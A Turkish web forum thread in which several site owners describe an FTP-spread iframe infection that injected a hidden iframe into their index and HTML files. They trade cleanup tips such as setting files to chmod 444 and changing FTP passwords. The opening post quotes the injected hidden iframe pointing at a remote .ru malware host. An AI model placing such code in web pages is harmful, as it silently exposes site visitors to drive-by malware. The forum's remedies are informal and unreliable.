Bu virüs'e dikkat; pepsi97

Dün gece google'de gezinirken google'dan siteme giriş yaptım; karşıma win'le alakalı kendi pc'me yüklemem gereken bir uyarı işareti çıktı bu virus ftp'ye bulaşmış olmalı html 'nin içinde şu kodu gördüm.
<iframe src="http://a5h.ru:8080/ts/in.cgi?pepsi97" width=125 height=125 style="visibility: hidden"></iframe>
Bu virus hakkında bilgisi olan varmı? temizlendiğinden nasıl emin olabilirim.

Index dosyalarınızı CHMod 444 yaparsanız virüsleri durdurma da %90 başarılı olursunuz benim görüşüm.

iframe virusudur hocam bendede var ftp yi temizleyin virus bulasabilecek index.php ve html dosyalarını 444 yapın sonra ftp şifrelerini degiştirin

Uyarı : ftp şifresi kaydetmeyen bir program tercih ediniz..

merhaba dostum aynı virüs benim sitemede girmiş nette ararken aşağıdaki mesajları gördüm
Server Hacked ..! - cPanel Forums

orada bir script paylaşmışlar fakat çalıştıramadım herhalde bu script hangi dosyalara bulaştığını gösteriyor http://www.maquinadigital.pt/scripts.tar.gz

bu virüs benimde başıma musallat oldu.

chmodd 444 olduğunda kesin çözüm müdür?

neden kaynaklıdır hostda mıdır suç scriptte mi ? varmı bu dertten muzdarip olan başka birileri

Bugün öğlen benimde forum sitemde vardı. forum ana sayfası bembeyaz çıkıyordu.. Aynı iframe.. Temizledim gün içi baktım bu akşam başka bir hosting firmasında bulunan sitemdede var.. Sanırım ftp ye bulaşmış bir virüs.. index.htlm index.php ne kadar dosya varsa hepsine bulaşmış.

evet feci hızlı yayılıyor. bu ay içerisinde 2. kez başıma geldi benim.

bu açığı kapatacak birileri çıkar elbet

Format atın bitsin ama kurtulcam diyorsanız bana pm atın özel program yazabilirim.